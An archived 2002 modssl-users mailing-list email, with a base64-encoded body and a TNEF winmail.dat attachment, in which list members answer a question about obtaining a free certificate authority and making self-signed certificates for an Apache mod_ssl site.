Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA00974; Fri, 24 May 2002 12:39:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id MAA00960; Fri, 24 May 2002 12:39:09 +0200 (MET DST)
Subject: RES: security
Date: Fri, 24 May 2002 07:39:10 -0300
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C2030F.3D46529A"
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
X-MS-TNEF-Correlator: 
Thread-Topic: security
content-class: urn:content-classes:message
Thread-Index: AcIChXxkFKsHYlG7QnSS8WqeDkDUiAAAB9YgAAeOCHAAGtR6UA==
From: "Angelo Marcos Rigo" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2030F.3D46529A
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: base64

YWxscmlndGghIHRoYW5rwrRzIHZlcnkgbXVjaCEgaSB3aWxsIHJlYWQgaXQhDQoNCgktLS0tLU1l
bnNhZ2VtIG9yaWdpbmFsLS0tLS0gDQoJRGU6IFdvb2RyYXNrYSwgUm9iZXJ0IEouIA0KCUVudmlh
ZGE6IHF1aSAyMy81LzIwMDIgMTg6NTEgDQoJUGFyYTogbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcg
DQoJQ2M6IA0KCUFzc3VudG86IFJFOiBzZWN1cml0eQ0KCQ0KCQ0KDQoJU29ycnkgQW5nZWxvLCBJ
IHJlcGxpZWQgdG8gZmFzdC4gIFJlYWQgb24NCglodHRwOi8vd3d3Lm1vZHNzbC5vcmcvZG9jcy8y
Ljgvc3NsX2ZhcS5odG1sIHVuZGVyIHRoZQ0KY2VydGlmaWNhdGUNCglzZWN0aW9uLiAgSXQgdGFs
a3MgYWJvdXQgZHVtbXkgQ0EncyBhbmQgbWFraW5nIHlvdXIgb3duDQpzZWxmLXNpZ25lZA0KCWNl
cnRzLg0KCQ0KCS0tLS0tT3JpZ2luYWwgTWVzc2FnZS0tLS0tDQoJRnJvbTogQW5nZWxvIE1hcmNv
cyBSaWdvIFttYWlsdG86YW5nZWxvQGNvbGVnaW9hbmNoaWV0YS5nMTIuYnJdDQoJU2VudDogVGh1
cnNkYXksIE1heSAyMywgMjAwMiAxOjE0IFBNDQoJVG86IG1vZHNzbC11c2Vyc0Btb2Rzc2wub3Jn
DQoJU3ViamVjdDogUkVTOiBzZWN1cml0eQ0KCQ0KCQ0KCXRoYW5rwrRzIGEgbG90ISENCgkNCgk+
IC0tLS0tIE1lbnNhZ2VtIG9yaWdpbmFsIC0tLS0tDQoJPiBEZTogICAgICAgICAgIFRvbnkgVmls
bGFzZW5vciBbU01UUDp0b255QHZpbGxhc2Vub3Iub3JnXQ0KCT4gRW52aWFkYSBlbTogICAgICAg
ICAgIHF1aW50YS1mZWlyYSwgMjMgZGUgbWFpbyBkZSAyMDAyIDE0OjU4DQoJPiBQYXJhOiAgICAg
ICAgIG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnDQoJPiBBc3N1bnRvOiAgICAgICAgICAgICAgUkU6
IHNlY3VyaXR5DQoJPg0KCT4NCgk+IGh0dHA6Ly93d3cuZnJlZXNzbC5jb20vDQoJPg0KCT4NCgk+
IE9uIFRodSwgMjMgTWF5IDIwMDIsIFdvb2RyYXNrYSwgUm9iZXJ0IEouIHdyb3RlOg0KCT4NCgk+
ID4gSSBoYXZlIG5ldmVyIGhlYXJkIG9mIGEgZnJlZSBDQS4gIFlvdSBjYW4gY3JlYXRlIHlvdXIg
b3duDQoJPiBjZXJ0aWZpY2F0ZXMNCgk+ID4gYW5kIGZha2UgQ0EgdXNpbmcgdGhlIFNuYWtlT2ls
IG1ldGhvZC9kb2NzLCBhbmQgdXNlcnMgd291bGQNCmhhdmUgdG8NCgk+ID4gYWNjZXB0IHlvdXIg
Y2VydGlmaWNhdGUsIGJ1dCBJIGRvbid0IHRoaW5rIHRoZXJlIGFyZSBhbnkNCkNBJ3Mgd2l0aA0K
CT4gPiBjZXJ0aWZpY2F0ZXMgYWxyZWFkeSBidWlsdCBpbiB0byB0aGUgYnJvd3NlcnMgdGhhdCB3
aWxsIGp1c3QNCmdpdmUNCgk+IHlvdSBhDQoJPiA+IGNlcnRpZmljYXRlLg0KCT4gPg0KCT4gPiAt
LS0tLU9yaWdpbmFsIE1lc3NhZ2UtLS0tLQ0KCT4gPiBGcm9tOiBBbmdlbG8gTWFyY29zIFJpZ28N
ClttYWlsdG86YW5nZWxvQGNvbGVnaW9hbmNoaWV0YS5nMTIuYnJdDQoJPiA+IFNlbnQ6IFRodXJz
ZGF5LCBNYXkgMjMsIDIwMDIgMTI6MzUgUE0NCgk+ID4gVG86IG1vZHNzbC11c2Vyc0Btb2Rzc2wu
b3JnDQoJPiA+IFN1YmplY3Q6IFJFUzogc2VjdXJpdHkNCgk+ID4NCgk+ID4NCgk+ID4gSSBoYXZl
IGxpbnV4IGFwYWNoZSBtbzBkX3NzbCBhbmQgb3BlbnNzbCBpIHdvdWxkIGxpa2UgdG9rbm93DQph
IGZyZWUNCgk+IGNhDQoJPiA+IHRvIGdldCBhIGNlcnRpZmljYXRlIGFueW9uZSBrbm93cz8NCgk+
ID4NCgk+ID4gPiAtLS0tLSBNZW5zYWdlbSBvcmlnaW5hbCAtLS0tLQ0KCT4gPiA+IERlOiAgICAg
ICAgICAgICAgIEFuZ2VsbyBNYXJjb3MgUmlnbw0KCT4gPiA+IEVudmlhZGEgZW06ICAgICAgICAg
ICAgICAgcXVpbnRhLWZlaXJhLCAyMyBkZSBtYWlvIGRlIDIwMDINCjE0OjE3DQoJPiA+ID4gUGFy
YTogICAgICAgICAgICAgbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcNCgk+ID4gPiBBc3N1bnRvOiAg
ICAgICAgICBzZWN1cml0eQ0KCT4gPiA+DQoJPiA+ID4gSGkNCgk+ID4gPg0KCT4gPiA+IEkgd291
bGQgbGlrZSB0byBoYXZlIGEgc2VjdXJlIHdlYnNpdGUNCgk+ID4gPiBnaG93IGNhbiBpIGRvIHRo
YXQ/DQoJPiA+ID4NCgk+ID4gPg0KCT4NCl9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX18NCgk+ID4gPiBBcGFjaGUgSW50
ZXJmYWNlIHRvIE9wZW5TU0wgKG1vZF9zc2wpDQoJPiB3d3cubW9kc3NsLm9yZw0KCT4gPiA+IFVz
ZXIgU3VwcG9ydCBNYWlsaW5nIExpc3QNCgk+IG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnDQoJPiA+
ID4gQXV0b21hdGVkIExpc3QgTWFuYWdlcg0KCT4gbWFqb3Jkb21vQG1vZHNzbC5vcmcNCgk+ID4N
Cgk+DQpfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fDQoJPiA+IEFwYWNoZSBJbnRlcmZhY2UgdG8gT3BlblNTTCAobW9k
X3NzbCkNCgk+IHd3dy5tb2Rzc2wub3JnDQoJPiA+IFVzZXIgU3VwcG9ydCBNYWlsaW5nIExpc3QN
Cgk+IG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnDQoJPiA+IEF1dG9tYXRlZCBMaXN0IE1hbmFnZXIN
Cgk+IG1ham9yZG9tb0Btb2Rzc2wub3JnDQoJPiA+DQoJPg0KX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXw0KCT4gPiBB
cGFjaGUgSW50ZXJmYWNlIHRvIE9wZW5TU0wgKG1vZF9zc2wpDQoJPiB3d3cubW9kc3NsLm9yZw0K
CT4gPiBVc2VyIFN1cHBvcnQgTWFpbGluZyBMaXN0DQoJPiBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9y
Zw0KCT4gPiBBdXRvbWF0ZWQgTGlzdCBNYW5hZ2VyDQoJPiBtYWpvcmRvbW9AbW9kc3NsLm9yZw0K
CT4gPg0KCT4NCgk+DQpfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fDQoJPiBBcGFjaGUgSW50ZXJmYWNlIHRvIE9wZW5T
U0wgKG1vZF9zc2wpDQp3d3cubW9kc3NsLm9yZw0KCT4gVXNlciBTdXBwb3J0IE1haWxpbmcgTGlz
dA0KbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcNCgk+IEF1dG9tYXRlZCBMaXN0IE1hbmFnZXINCm1h
am9yZG9tb0Btb2Rzc2wub3JnDQoJDQpfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQoJQXBhY2hlIEludGVyZmFjZSB0
byBPcGVuU1NMIChtb2Rfc3NsKQ0Kd3d3Lm1vZHNzbC5vcmcNCglVc2VyIFN1cHBvcnQgTWFpbGlu
ZyBMaXN0DQptb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0KCUF1dG9tYXRlZCBMaXN0IE1hbmFnZXIN
Cm1ham9yZG9tb0Btb2Rzc2wub3JnDQoJDQpfX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQoJQXBhY2hlIEludGVyZmFj
ZSB0byBPcGVuU1NMIChtb2Rfc3NsKQ0Kd3d3Lm1vZHNzbC5vcmcNCglVc2VyIFN1cHBvcnQgTWFp
bGluZyBMaXN0DQptb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0KCUF1dG9tYXRlZCBMaXN0IE1hbmFn
ZXINCm1ham9yZG9tb0Btb2Rzc2wub3JnDQoJDQoNCg==

------_=_NextPart_001_01C2030F.3D46529A
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

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
r9+w77H//7MPtB+1L6Tvms+dD98BlADkY3XzoHR5lP+WD5cf/5/voP+5r8C/wc/C38Pv55//vd++
78U/xk/Ev8tfzG/Nf/POj8+VSGnHz8jfye/QP//RT8+/1o/Xn9iv2b/Hn9Ov/9S/2w/cH9qP4S/i
P7oPux8HnM/j/3ArSSB3b3VobGQg35BrYlCioCB4aGF2YlA44LxzYlB3/mW4ILzA38Hdv97P39/o
r3/pv+MP8S/yP/NP9F/oEGcAaG93IGNhbiC+aWKwKlDl3+bv5/R06/D8dD/tT+5f72/1v/bP9T//
/58ArwG/As/db/y//c8EH/8FLwOfCj8LTwxfDW8JTwdfvwhvCX8Pzw4/+W/6f18Zn/carxu/HM9f
EX8SjxOfFK//Fb8Wzxff568hXyJvDs8nD9OhuSSQY2hiUElhYJQQBmYrcOujT3BlblNQU0wgKJOB
X5SBKb8d/x8PIB8o7yn/KGN3M0D+LpRfLh8vLzA/MU8nzyO/fyX/Jd83/zkPPJ89r3DBVUGUASBT
dXBwM/B0DCBNYoA2IWcgTGn8c3Q0LzU/Nk8/H0Avkz//lE9Df0SPRZ9Grz3vOd867787/03vTv9S
j1OfohN1oqDfYnDtIOtQQtJCQW5K0ElAP0ovSz9MT1UfVi9IZGFq/0nw+NBIsEl/WU9aX1tvXH//
U+9P31DvUf9jjxC/YB9hL/9p72hvZF9lb2Z/GT9zP3RP/3VfHX9rD2wfbS9uP29PcF//cW99z3rv
Kr8rzyzfdz94T/95X3+PgJ8zP4QvhT+GT4df/4hvVL+Ob49/fP9+D0GPQp//ix+ML40/kO9H70j/
im+Xz/+Y35nvmv+SX6GPop+S75P//37SV49Yn56vn7+gz6R/Xe//Xv+qT6tfrG+tf66Ps9+07/+z
b7F/so+4z7dPtb+mb6d//3J/wh/DL8Q/dr+577r/vA//vR++L78/fi/Iv8nPgV+Cb/+Df8Yfxy/I
P85viM+J39MP/9Qf1S/WP8o/3D/dT95fy9//lH+Vj5af2f/bD96/38+b7/+c/+Wf5q/nv+jP6d/e
n/Bv//F/4c/i36ivqb/tT+5f72//8x+vD7Af+O/5//sP/B/9L//0v/XPzU8DL7g//78AzwHf/wgP
CR8KLws/DE8NXw5vBM//Bd/AfxgvGT8aT8S/D/8RD/8SHxMvFD8VTxZf9sfQb9F4HyHvIv8HRNIf
H8duYnPCcCB5XCdhMB6vKa//Kr8rzyzfLe8u/zAPMR8yL/8zPzRPNV82bzd/OI85nzqv/zu/PM89
3z7vP/9BD0IfQy//RD9FT0ZfR29If0mPSp9Lr/9Mv03PTt9P71D/Ug9TH1Qv/1U/Vk9XX1hvIT8m
jyef2E//HH8djx6fH68gvwdg4+/k8v9dD14fB0TlP1rvWR9qL2s//2xPbV9ub29/cI9xn3Kvc7//
dM9133bvd/95D3ofey98P/99T35ff2+Af4GPgp+Dr4S//4XPht+H74j/ig+LH4wvjT//jk+PX5Bv
kX+Sj5OflK+Vv/+Wz5ffmO+Z/5sPnB+dL54//59PoF+hb6J/XO9oTwcm6x//YA9hH2Ivo29kT8+q
91ymj/+nnwdE+D+kP6VPrV+077X//7cPuB+5L7o/u0+8X71vvn//v4/An8Gvwr/Dz8Tfxe/G///I
D8kfyi/LP8xPzV/Ob89//9CP0Z/Sr9O/1M/V39bv1///2Q/aH9sv3D/dT95f32/gf//hj+Kf46/k
v+XP5t/n7+j//+oP6x/sL+0/7k/vX/Bv8X//8o/zn/Sv9b/2z/ff+O/5/z/7D/wf/S+l/7GPqB5h
avWqQGSwQG+pz6rfq+/+Nv8bPwlvCn8LjxwvBl+sfiRl/wGvAr8oRCTfJe8RDygPKR///6/93xdP
GF8Zbxp/G48cn/8drx6/H88g3yHvIv8kDyUf/yYvJz8oTylfKm8rfyyPLZ//Lq8vvzDPMd8y7zP/
NQ82H/83Lzg/OU86XztvPH89jz6f/z+vQL9Bz0LfQ+9E/0YPAL//FC8VP19PBV8Nz6yNZg9nH/9L
v2k/SC9JP0dvVd9W71f//1kPWh9bL1w/XU9eX19vYH//YY9in2OvZL9lz2bfZ+9o//9qD2sfbC9t
P25Pb19wb3F//3KPc590r3W/ds9333jvef//ew98H30vfj9/T4BfgW+Cf/+Dj4Sfha+Gv4fPiN+J
74r//4wPjR9KL1LvU/+o/03fTu//T/8Pg7Avkf+TD7Nfj0+QX/+Oj51fnm+ff6CPoZ+ir6O//6TP
pd+m76f/qQ+qH6svrD//rU+uX69vsH+xj7Kfs6+0v/+1z7bft++4/7oPux+8L70//75Pv1/Ab8F/
wo/Dn8Svxb//xs/H38jvyf/LD8wfzS/OP//PT9Bf0W/Sf9OP1J/Vr9a//9fP2N/Z79r/3A/dH94v
3z//4E/hX+Jv43/kj+WfkQ+Z//+bDwQflX+Wj5efCF/x//MP//QfDJ/u7+//D8/q7xHvEv//+N/5
7xYv53/oj+a/AC8BP/8CTwNfBG8FfwaPB58Irwm//wrPC98M7w3/Dw8QHxEvEj//E08UXxVvFn8X
jxifGa8av/8bzxzfHe8e/yAPIR8iLyM//yRPJV8mbyd/KI8pnyqvK7//LM8t3y7v6Z/9D/4fTW/1
n//2r1CfUa8zrzS/VN8xLzI//zBvPt8/70D/Qg9DH0QvRT//Rk9HX0hvSX9Kj0ufTK9Nv/9Oz0/f
UO9R/1MPVB9VL1Y//1dPWF9Zb1p/W49cn12vXr//X89g32HvYv9kD2UfZi9nP/9oT2lfam9rf2yP
bZ9ur2+//3DPcd9y73P/dQ92HzMvO+//k4+UnzbfN++Xz5jfeq97v/+cD3f/eQ93P4YPhx+IL4k/
/4pPi1+Mb41/jo+Pn5Cvkb//ks+T35Tvlf+XD5gfmS+aP/+bT5xfnW+ef5+PoJ+hr6K//6PPpN+l
76b/qA+pH6ovqz//rE+tX65vr3+wj7Gfsq+zv/+0z7Xftu+3/7kPuh+7L7w//71Pvl+/b8B/wY/C
n8OvxL//xc/G38fvyP/KD8sfzC/NP//OT3m/gq+Dv+zPfi9/P4BPBdasNdeRL0ZPTlT/1+nX98/Q
0WbT0tvI96jTw9PY79M2NzLaoVDX4NasBjD+0NqwQkxPQ0tgUVVPVEXbH98/Z0/cUdPv5M/TYzU4
4dJPvERZ4L3gYOZP6NE32qFQSFRNTNfgfesAAAAAHwA1EAEAAAB8AAAAPABGAEEAOQA5ADIANwAw
ADIAMgBCADEANABFADAANAA1ADgAOAA4ADYARgAyADYAMQAyADkAQwBCAEYAMgAwADMAMAA3AEUA
QgA2ADcAQABBAEUAWAAwADEALgBhAG4AYwBoAGkAZQB0AGEALgBsAG8AYwBhAGwAPgAAAB8ARxAB
AAAAHgAAAG0AZQBzAHMAYQBnAGUALwByAGYAYwA4ADIAMgAAAAAACwDyEAEAAAAfAPMQAQAAACgA
AABSAEUAUwAlADMAQQAgAHMAZQBjAHUAcgBpAHQAeQAuAEUATQBMAAAACwD2EAAAAABAAAcwYPDE
JQ8DwgFAAAgwe/ZNPQ8DwgEDAN4/6f0AAAMA8T8WBAAAHwD4PwEAAAAmAAAAQQBuAGcAZQBsAG8A
IABNAGEAcgBjAG8AcwAgAFIAaQBnAG8AAAAAAAIB+T8BAAAAXgAAAAAAAADcp0DIwEIQGrS5CAAr
L+GCAQAAAAAAAAAvTz1BTkNISUVUQS9PVT1GSVJTVCBBRE1JTklTVFJBVElWRSBHUk9VUC9DTj1S
RUNJUElFTlRTL0NOPUFOR0VMTwAAAB8A+j8BAAAAKgAAAFMAeQBzAHQAZQBtACAAQQBkAG0AaQBu
AGkAcwB0AHIAYQB0AG8AcgAAAAAAAgH7PwEAAAAeAAAAAAAAANynQMjAQhAatLkIACsv4YIBAAAA
